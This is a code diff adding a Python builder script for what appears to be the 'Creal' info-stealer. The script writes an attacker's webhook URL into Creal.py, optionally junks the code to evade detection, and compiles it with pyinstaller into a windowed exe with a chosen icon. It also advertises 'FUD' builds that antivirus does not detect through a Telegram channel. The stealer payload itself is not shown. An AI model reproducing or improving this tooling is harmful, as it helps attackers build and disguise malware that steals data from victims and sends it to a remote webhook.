|
| 1 | +from pystyle import * |
| 2 | +import os |
| 3 | +import subprocess |
| 4 | +from colorama import * |
| 5 | +import time |
| 6 | +from tkinter import filedialog, Tk |
| 7 | + |
| 8 | +os.system('clear' if os.name == 'posix' else 'cls') |
| 9 | + |
| 10 | +intro = """ |
| 11 | +
|
| 12 | + ▄▀▄▄▄▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀█▄ ▄▀▀▀▀▄ |
| 13 | +█ █ ▌ █ █ █ ▐ ▄▀ ▐ ▐ ▄▀ ▀▄ █ █ |
| 14 | +▐ █ ▐ █▀▀█▀ █▄▄▄▄▄ █▄▄▄█ ▐ █ by ayhu & artonus |
| 15 | + █ ▄▀ █ █ ▌ ▄▀ █ █ |
| 16 | + ▄▀▄▄▄▄▀ █ █ ▄▀▄▄▄▄ █ ▄▀ ▄▀▄▄▄▄▄▄▀ |
| 17 | +█ ▐ ▐ ▐ █ ▐ ▐ ▐ █ |
| 18 | +▐ ▐ ▐ |
| 19 | +
|
| 20 | + > Press Enter |
| 21 | +
|
| 22 | +""" |
| 23 | + |
| 24 | +Anime.Fade(Center.Center(intro), Colors.black_to_red, Colorate.Vertical, interval=0.035, enter=True) |
| 25 | + |
| 26 | + |
| 27 | +print(f"""{Fore.LIGHTRED_EX} |
| 28 | +
|
| 29 | + ▄▀▄▄▄▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀█▄ ▄▀▀▀▀▄ |
| 30 | +█ █ ▌ █ █ █ ▐ ▄▀ ▐ ▐ ▄▀ ▀▄ █ █ |
| 31 | +▐ █ ▐ █▀▀█▀ █▄▄▄▄▄ █▄▄▄█ ▐ █ by ayhu & artonus |
| 32 | + █ ▄▀ █ █ ▌ ▄▀ █ █ |
| 33 | + ▄▀▄▄▄▄▀ █ █ ▄▀▄▄▄▄ █ ▄▀ ▄▀▄▄▄▄▄▄▀ |
| 34 | +█ ▐ ▐ ▐ █ ▐ ▐ ▐ █ |
| 35 | +▐ ▐ ▐ |
| 36 | +
|
| 37 | + Welcome to builder |
| 38 | +
|
| 39 | +""") |
| 40 | + |
| 41 | +time.sleep(1) |
| 42 | + |
| 43 | + |
| 44 | +while True: |
| 45 | + Write.Print("\nWhich option do you want to choose: ", Colors.red_to_yellow) |
| 46 | + Write.Print("\n1. Build Exe", Colors.red_to_yellow) |
| 47 | + Write.Print("\n2. Build FUD Exe (Virus programs undetected)", Colors.red_to_yellow) |
| 48 | + Write.Print("\n3. Close", Colors.red_to_yellow) |
| 49 | + Write.Print("\nMake your selection: ", Colors.red_to_yellow, end="") |
| 50 | + choice = input() |
| 51 | + |
| 52 | + if choice == "1": |
| 53 | + os.system("cls || clear") |
| 54 | + webhook = input(Fore.CYAN + "\nEnter Your Webhook: " + Style.RESET_ALL) |
| 55 | + |
| 56 | + filename = "Creal.py" |
| 57 | + filepath = os.path.join(os.getcwd(), filename) |
| 58 | + with open(filepath, "r", encoding="utf-8") as f: |
| 59 | + content = f.read() |
| 60 | + new_content = content.replace('"WEBHOOK HERE"', f'"{webhook}"') |
| 61 | + with open(filepath, "w", encoding="utf-8") as f: |
| 62 | + f.write(new_content) |
| 63 | + Write.Print(f"\n{filename} file updated.", Colors.red_to_yellow) |
| 64 | + |
| 65 | + obfuscate = False |
| 66 | + while True: |
| 67 | + answer = input(Fore.CYAN + "\nDo you want to junk your code? (Y/N) " + Style.RESET_ALL) |
| 68 | + if answer.upper() == "Y": |
| 69 | + os.system("python junk.py") |
| 70 | + Write.Print(f"\n{filename} The file has been junked.", Colors.red_to_yellow) |
| 71 | + break |
| 72 | + elif answer.upper() == "N": |
| 73 | + break |
| 74 | + else: |
| 75 | + Write.Print("\nYou have entered invalid. Please try again.", Colors.red_to_purple) |
| 76 | + |
| 77 | + answer = input(Fore.CYAN + "\nDo you want to make exe file? (Y/N) " + Style.RESET_ALL) |
| 78 | + if answer.upper() == "Y": |
| 79 | + answer = input(Fore.CYAN + "\nDo you want to add an icon? (Y/N) " + Style.RESET_ALL) |
| 80 | + if answer.upper() == "Y": |
| 81 | + Tk().withdraw() |
| 82 | + icon_file = filedialog.askopenfilename(filetypes=[("Icon Files", "*.ico")]) |
| 83 | + if icon_file: |
| 84 | + subprocess.call(["pyinstaller", "--onefile", "--windowed", "--icon", icon_file, filename]) |
| 85 | + Write.Print(f"\n{filename} has been converted to exe with the selected icon.", Colors.red_to_yellow) |
| 86 | + else: |
| 87 | + Write.Print("\nThe file you choose must have .ico extension!", Colors.red_to_purple) |
| 88 | + else: |
| 89 | + subprocess.call(["pyinstaller", "--onefile", "--windowed", filename]) |
| 90 | + Write.Print(f"\n{filename} The file has been converted to exe.", Colors.red_to_yellow) |
| 91 | + |
| 92 | + elif choice == "2": |
| 93 | + Write.Print("\nWe can share the fud for free but not now. if you want fud Telegram: https://t.me/CrealStealer", Colors.red_to_yellow) |
| 94 | + |
| 95 | + elif choice == "3": |
| 96 | + Write.Print("\nExiting the program...", Colors.red_to_yellow) |
| 97 | + break |
| 98 | + |
| 99 | + else: |
| 100 | + Write.Print("\nYou have entered invalid. Please try again.", Colors.red_to_purple) |
0 commit comments